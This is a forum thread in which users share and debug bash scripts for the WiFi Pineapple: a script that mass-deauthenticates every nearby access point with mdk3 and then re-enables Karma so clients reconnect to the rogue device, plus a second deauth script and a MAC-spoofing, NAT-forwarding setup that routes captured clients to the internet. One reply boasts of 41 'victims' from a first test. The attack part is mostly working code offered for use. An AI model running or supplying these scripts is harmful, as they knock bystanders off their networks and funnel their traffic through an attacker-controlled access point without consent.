MDKarma Script

[Foxtrot]

Hey guys!

I am currently making a script that basically :

-Asks for a MAC to avoid.

-Asks how long to deauth for

-Asks what interface to deauth on

-Disables karma

-Puts wlan0 into RFMON (Monitor Mode)

-Starts MDK3 Deauthing for x amount of seconds inputted at the beginning

-After x amount of seconds, Stops MDK3

-Removes mon0

-Starts karma again

The point of this script is that it deauths all nearby access points then enables karma so that the people will reconnect to the pineapple, Allthough this can be done manually I thought a nice script would be nice that did it for you :)

Run this script by copy/pasting into a file and call it mdkarma.sh, then do chmod +x mdkarma.sh, then do ./mdkarma , Incase it wasn't obvious, when I update the script, you have to the new code with the existing script you have...

***Module Development and further script development***

As suggested by some people, I have decided to take a go at developing a pineapple module that will automate 'attacks' such as the MDKarma script and other tricks I have planned from a UI, as well as flexibiltiy such as being able to edit the scripts to suit your needs without SSH'in into the pineapple to edit... I hope you all share your edits too and continue with feedback that helps add features :)....

--------------------------------------------------------------------------------------------------------------------------------------

Edit : Version 1.2 - Fixed Channel Hopping, Added Whitelisting and added spacing for easier reading :)

Edit : Version 1.2.3 - Added Whitelisiting.

Please give some feedback and any improvements :)

Code :

#!/bin/bash

#Part of the Pineapple Mojito Framework
#Made by Foxtrot
#Version 1.2.3

#Intro
echo "!! This script is to be used only for legal, safe and authorised uses !!"
echo "MDKarma V1.2.3"
sleep 6

#Ask how long to deauth for
echo -n "How long (In Seconds) to deauth for? : "; read deauthTime

#Ask what Interface
echo -n "What interface would you like to deauth on? : "; read deauthInterface

#Ask if you want to whitelist
read -r -p "Do you want to add a whitelist? [Y/n] " response
if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]]
then
    echo "   "
    echo "Whitelist Created!"
    echo "  "
    touch whitelist.txt
    read -r -p "MAC Address to add : " macaddr
    echo $macaddr >> whitelist.txt
   else
    echo "   "
    echo "Avoiding Whitelist Creation!"
    echo "  "

fi


#Put wlan0 up
echo "Checking Interface wlan0 is up...."
wifi
sleep 3

#Stop Karma
echo "   "
echo "Killing Karma...."
hostapd_cli -p /var/run/hostapd-phy0 karma_disable > /dev/null
sleep 3

#Put deauthInterface into monitor mode
echo "   "
echo "Putting $deauthInterface into monitor mode...."
airmon-ng start $deauthInterface > /dev/null
sleep 3

#Start deauthing with MDK3 and stop
echo "   "
echo "Deauthing Access Points with MDK3...."
mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14 & sleep $deauthTime && killall mdk3
sleep 3

#Kill airmon-ng and start Karma again.
echo "Removing mon0 and enabling karma...."
airmon-ng stop mon0 > /dev/null
wifi
hostapd_cli -p /var/run/hostapd-phy0 karma_enable > /dev/null
sleep 3

#Finish
echo "  "
echo "MDKarma Finished!"

-Foxtrot

Edited March 16, 2013 by Foxtrot

[Boba Fett]

Nice!!!!!!

I can run this script from Pineapple GIU?

Edited February 22, 2013 by Boba Fett

[Foxtrot]

Edit : Basically, it won't run from a WPS script set with Whistle Masters 'button' module, because I plan to incorporate features that require user input.

-Foxtrot

Edited February 22, 2013 by Foxtrot

[Boba Fett]

let me try it!

[Foxtrot]

let me try it!

Thats why I posted it :p

-Foxtrot

[Boba Fett]

Doesnt works for me :-(

[Foxtrot]

Doesnt works for me :-(

Would help if you included some more detail. It works fine for me.

-Foxtrot

[Boba Fett]

The script runs, but doesnt disconnect my imac, my windows 7 laptop or my Blackberry 9810. The remains connected.

[Foxtrot]

The script runs, but doesnt disconnect my imac, my windows 7 laptop or my Blackberry 9810. The remains connected.

Ah crap, replace the whole code in the .sh file you have with the one in the first post :)

The problem is the time i set it to. I am working on getting it so you enter a time you want to deauth for, but bash is making me look like a fool haha

If it still fails to deauth, increase the time in the sleep here

mdk3 mon0 d & sleep 45 && killall mdk3
 

but on the script (Duh)

-Foxtrot

Edited February 22, 2013 by Foxtrot

[Zephyr]

Nice!!!!!!

I can run this script from Pineapple GIU?

Not sure but I believe it may have been meant to be run as a startup script or via the WPS button.

[Foxtrot]

Not sure but I believe it may have been meant to be run as a startup script or via the WPS button.

Gah, Updated the first post with how to run it, should've put it there in the first place, Sorry!

-Foxtrot

[Boba Fett]

Weird, Now the script not run.

[Boba Fett]

I´m running the script on the button (custom script 1) module.

I increase the time on the script to 120 and nothing yet, cant get desauth on my devices.

I dont know why :-(

[Boba Fett]

This is my log:

22:03:10 Pineapple authpriv.info dropbear[3365]: Exit (root): Exited normally
22:01:22 Pineapple kern.info kernel: [ 1593.230000] br-lan: port 2(wlan0) entered forwarding state
22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state
22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state
22:01:20 Pineapple kern.info kernel: [ 1591.130000] device wlan0 entered promiscuous mode
22:01:19 Pineapple kern.info kernel: [ 1590.380000] device wlan0 left promiscuous mode
22:01:19 Pineapple kern.info kernel: [ 1590.380000] br-lan: port 2(wlan0) entered disabled state

[Foxtrot]

This is my log:

22:03:10 Pineapple authpriv.info dropbear[3365]: Exit (root): Exited normally
22:01:22 Pineapple kern.info kernel: [ 1593.230000] br-lan: port 2(wlan0) entered forwarding state
22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state
22:01:20 Pineapple kern.info kernel: [ 1591.230000] br-lan: port 2(wlan0) entered forwarding state
22:01:20 Pineapple kern.info kernel: [ 1591.130000] device wlan0 entered promiscuous mode
22:01:19 Pineapple kern.info kernel: [ 1590.380000] device wlan0 left promiscuous mode
22:01:19 Pineapple kern.info kernel: [ 1590.380000] br-lan: port 2(wlan0) entered disabled state

Dude. I thought you meant you were running it from the Advanced section, I said i think it might run. It is meant to be run from SSH.

-Foxtrot

[Boba Fett]

Ah ok. Let me try by ssh. It will be nice if runs with button option, for making a portable desauth.

[Boba Fett]

Nothing. I run the script via ssh, the script run, but my imac, pc win 7 or blackberry et desauthenticate.

[PineDominator]

Nothing. I run the script via ssh, the script run, but my imac, pc win 7 or blackberry et desauthenticate.

Last July I made a setup script for mdk3 on the pineapple. I can dig it up if u you'd like. But I found that some devices would not deauth. Even though it does on others. It may be mdk3 on OpenWRT?

[Foxtrot]

Last July I made a setup script for mdk3 on the pineapple. I can dig it up if u you'd like. But I found that some devices would not deauth. Even though it does on others. It may be mdk3 on OpenWRT?

hmmm. Strange it seems to d/c my laptop from my AP, but i can't do much testing as my antenna is broken atm ;(...

I feel shame haha

-Foxtrot

[PineDominator]

#!/bin/sh

airmon-ng start $1

ifconfig $1 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt

mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 &

sleep 35

killall -9 mdk3

airmon-ng stop mon0

This script is designed to work with an external wifi adapter like the Alfa NHA

I used this script after connecting my external adapter to a router for internet.

#!/bin/sh

#Change the Mac address of the usb wifi to something random.
ifconfig $1 down
macchanger -A $1
ifconfig $1 up


#WPA2 - Let's assume we're going to connect to a WPA2 network
wpa_supplicant -B -D nl80211 -i $1 -c /usb/wpa_supplicant.conf

#WEP - Uncomment if you want to conect to a WEP network
#iwconfig $1 mode managed key your_key_here
#iwconfig $1 essid "your access point name here"

#OPEN - Uncomment if you want to conect to a WEP network
#iwconfig $1 essid "your access point name here"


#Setup ipforwarding via iptables.
echo 1 > /proc/sys/net/ipv4/ip_forward

#Reset iptables
#iptables -F
#iptables -X

iptables -A FORWARD -o $1 -i br-lan -s 172.16.0.0/24 -m conntrack --ctstate NEW -jACCEPT
iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE

#Wait for 7 seconds to give enough time for association.
sleep 7

#Grab an ip via DHCP
udhcpc -i $1

the code above is to connect to a wireless router.

now you can run the mdk3 script as such

./deauth.sh wlan1

wlan1 is the external wifi adapter already connected to a wireless access point

the script will add the mac of wlan1 to a whitelist so mdk3 won't deauth it from the internet

it then runs for 35 seconds, enough time to deauth all channels

then it kills the process and disables the mon0 interface.

[Foxtrot]

Nice script petertfm! Kinda puts mine to shame.

Boba Fett has PM'd me with screenshots of the script running and it is deauthing as it should...

-Foxtrot

[PineDominator]

Nice script petertfm! Kinda puts mine to shame.

Boba Fett has PM'd me with screenshots of the script running and it is deauthing as it should...

-Foxtrot

Thanks. But you're script is still useful because it's killing hostapd and running on the internal wifi.

When whistle master's button module was working I tied the wps button to the deauth script. Only thing I had to do was because mdk3 had been installed to my usb it needs a sym link to the internal folder location. My mk4 setup script now sym links all opkg packages installed to usb to the internal folder structure.

Edited February 24, 2013 by petertfm

[condor]

works great! first test reaped 41 victims. well done...and simple.

[Whistle Master]

Thanks. But you're script is still useful because it's killing hostapd and running on the internal wifi.

When whistle master's button module was working I tied the wps button to the deauth script. Only thing I had to do was because mdk3 had been installed to my usb it needs a sym link to the internal folder location. My mk4 setup script now sym links all opkg packages installed to usb to the internal folder structure.

WPS button is indeed broken in last firmware version, this is why the button module is not working at the moment :(

[PineDominator]

works great! first test reaped 41 victims. well done...and simple.

Awesome :-)

The one thing I would like to work on is save what monitor interface was created to a variable, instead of assuming mon0.

Any thoughts on how to do this. Maybe grep and awk the out put from airmon-ng $1